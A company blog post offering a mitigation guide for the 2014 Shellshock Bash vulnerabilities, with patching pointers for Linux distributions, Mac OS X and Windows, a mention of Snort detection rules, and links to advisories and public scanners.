CVE-2014-6271 and CVE-2014-7169, also known as “Shellshock”, are high impact vulnerabilities affecting the Born Again Shell (BASH). The vulnerability allows an attacker to trick Bash into running arbitrary commands which could result in unauthorized disclosure of information, unauthorized modification and disruption of service. Because this is such a big threat, and because at Clever we take security seriously, we’ve decided to assemble a guide to mitigation.

Updating Bash

Two patches have been released in the past two days to address the initial revelation of the bug in addition to a subsequently discovered (and relatively minor) weakness in the first patch. See below for vendor specific information regarding patching.

*nix Distributions

The following distributions have added fixes to their respective repositories. Updating simply requires utilizing the built in system update tools.

• Ubuntu
• Fedora/RHEL/CentOS
• Debian
• Oracle and here too and
• Others – see this curated list of solutions (reddit)

Mac OSX

If you have OS X Mavericks, you can download the fix here: OS X bash Update 1.0

If you have a different version of the operating system, the recommended course of action is to wait for Apple’s offical response, unless you know that your system is exposing ports publicly on the
internet. See these instructions for a way that power users can close the hole immediately.

Windows

While most Windows users may mistakenly believe they are in the clear, they should be aware of a few special cases:

1. MSYS includes bash
2. cygwin includes bash
3. other applications such as msysgit may have installed these packages behind the scenes

Also see section entitled “All our things are on the Microsoft stack, are we at risk?”
in Troy Hunt’s excellent writeup.

Discovering Attack Attempts

Because there undoubtedly was a period of time between initial reports and eventual fixes of the bug, its important to at least attempt to discover any attacks or intrusions into systems. The popular NIDS tool “Snort” already has a set of discovery rules in v2.9.

We leave it to advanced readers to parse logs to discover attack attempts on their own.

Sources and links

• CVE-2014-6271 original vulnerability
• CVE-2014-7169 subsequent vulnerability
• Symantec has created a informative graphic of the command line exploit
• Excellent information available from Rapid7
• Public Scanners (use at your own risk!!)
  • http://bashsmash.ccsir.org/
  • http://shellshock.brandonpotter.com/
  • http://www.shellshocktest.com/